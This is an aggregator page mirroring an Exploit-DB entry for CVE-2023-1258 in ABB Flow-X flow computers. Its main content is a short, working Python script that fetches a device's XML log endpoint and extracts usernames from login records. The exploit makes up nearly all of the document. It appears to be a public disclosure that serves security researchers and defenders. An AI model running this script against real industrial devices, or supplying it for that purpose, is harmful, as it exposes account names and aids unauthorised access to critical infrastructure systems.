2

[webapps] ABB FlowX v4.00 - Exposure of Sensitive Information

 10 months ago
source link: https://www.exploit-db.com/exploits/51603
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

ABB FlowX v4.00 - Exposure of Sensitive Information

EDB-ID:

51603

EDB Verified:

Exploit:

  /  

Platform:

Hardware

Date:

2023-07-19

Vulnerable App:

# Exploit Title: ABB FlowX v4.00 - Exposure of Sensitive Information
# Date: 2023-03-31
# Exploit Author: Paul Smith
# Vendor Homepage: https://new.abb.com/products/measurement-products/flow-computers/spirit-it-flow-x-series
# Version: ABB Flow-X all versions before V4.00
# Tested on: Kali Linux
# CVE: CVE-2023-1258


#!/usr/bin/python
import sys
import re
from bs4 import BeautifulSoup as BS
import lxml
import requests

# Set the request parameter
url = sys.argv[1]


def dump_users():
    response = requests.get(url)

    # Check for HTTP codes other than 200
    if response.status_code != 200:
    	print('Status:', response.status_code, 'Headers:', response.headers, 'Error Response:',response.text)
    	exit()

    # Decode the xml response into dictionary and use the data
    data = response.text
    soup = BS(data, features="xml")
    logs = soup.find_all("log")
    for log in logs:
    	test = re.search('User (.*?) logged in',str(log))
    	if test:
    		print(test.group(0))
def main():
	dump_users()


if __name__ == '__main__':
  	main()

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK